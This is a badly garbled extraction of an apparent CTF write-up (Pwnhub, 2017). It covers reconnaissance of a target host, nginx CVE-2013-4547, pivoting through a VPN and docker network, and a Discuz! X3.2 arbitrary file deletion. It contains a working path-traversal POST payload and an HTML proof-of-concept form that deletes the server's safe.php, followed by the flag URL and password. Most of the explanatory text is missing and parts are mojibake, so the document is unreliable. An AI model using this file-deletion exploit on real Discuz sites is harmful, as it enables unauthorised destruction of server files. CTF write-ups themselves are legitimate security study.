pwnhub...Pwnhub 2013 C014 2017-10-04 µ # ç ; D W 8 Ì Ì S Ì S È Î 54.223.177.15280 E Û...

9
Pwnhub 2013 C014 2017-10-04 54.223.177.152+80 2017.10.03 17+50+16 Discuz Discuz 2017.10.03 11+24+40 Flag 2017.10.02 15+45+49 Nginx server CVE-2013-4547 + + + VPN + docker + Discuz!X CVE-2013-4547 nginx nmap 22 80 ssh .DS_Store

Transcript of pwnhub...Pwnhub 2013 C014 2017-10-04 µ # ç ; D W 8 Ì Ì S Ì S È Î 54.223.177.15280 E Û...

Page 1: pwnhub...Pwnhub 2013 C014 2017-10-04 µ # ç ; D W 8 Ì Ì S Ì S È Î 54.223.177.15280 E Û 2017.10.03 17+5016 e Discuz ç S 1 á Ô Ã C j a Discuz F × 2017.10.03 112440 ...

Pwnhub 2013C014 2017-10-04

54.223.177.152+80

2017.10.03 17+50+16 Discuz Discuz

2017.10.03 11+24+40 Flag

2017.10.02 15+45+49 Nginx server

CVE-2013-4547 + + + VPN + docker + Discuz!X

CVE-2013-4547

nginxnmap 22 80ssh

.DS_Store

Page 2: pwnhub...Pwnhub 2013 C014 2017-10-04 µ # ç ; D W 8 Ì Ì S Ì S È Î 54.223.177.15280 E Û 2017.10.03 17+5016 e Discuz ç S 1 á Ô Ã C j a Discuz F × 2017.10.03 112440 ...

1

2

3

4

5

admin/

config/

includes/

pwnhub/

upload /

pwnhub/ 403cve-2013-4547 pwmhub/

Page 6: pwnhub...Pwnhub 2013 C014 2017-10-04 µ # ç ; D W 8 Ì Ì S Ì S È Î 54.223.177.15280 E Û 2017.10.03 17+5016 e Discuz ç S 1 á Ô Ã C j a Discuz F × 2017.10.03 112440 ...

cron_run.sh

1

2cd /home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/run/ && python run.py

run.py

mail_send.pyVPN

Page 7: pwnhub...Pwnhub 2013 C014 2017-10-04 µ # ç ; D W 8 Ì Ì S Ì S È Î 54.223.177.15280 E Û 2017.10.03 17+5016 e Discuz ç S 1 á Ô Ã C j a Discuz F × 2017.10.03 112440 ...

mac L2TP/IPsec PSK …

docker

docker 172.17.x.x ipip 172.17.0.3

index.php

Page 8: pwnhub...Pwnhub 2013 C014 2017-10-04 µ # ç ; D W 8 Ì Ì S Ì S È Î 54.223.177.15280 E Û 2017.10.03 17+5016 e Discuz ç S 1 á Ô Ã C j a Discuz F × 2017.10.03 112440 ...

Oh Hacked safe.phpnmap 80 3306 8090

8090 Discuz! X3.2

Discuz!X

Discuz!Xindex.php include safe.phpsafe.php

1 http://172.17.0.3:8090/home.php?mod=spacecp&ac=profile&op=base

post

1 birthprovince=../../../../../../../../../../../../usr/share/nginx/html/safe.php&profilesubmit=1&formhash=b8f4701a

Page 9: pwnhub...Pwnhub 2013 C014 2017-10-04 µ # ç ; D W 8 Ì Ì S Ì S È Î 54.223.177.15280 E Û 2017.10.03 17+5016 e Discuz ç S 1 á Ô Ã C j a Discuz F × 2017.10.03 112440 ...

formhash hashCentOs nginx /usr/share/nginx/html/

1 http://172.17.0.3:8090/home.php?mod=spacecp&ac=profile&op=base

poc:

1

2

3

4

5

6

<form action="http://172.17.0.3:8090/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST"

<input type="file" name="birthprovince" id="file" />

<input type="text" name="formhash" value="b8f4701a"/></p>

<input type="text" name="profilesubmit" value="1"/></p>

<input type="submit" value="Submit" />

</from>

safe.php referer

get flag

http://172.17.0.3/index.php passwd=jiajiajiajiajia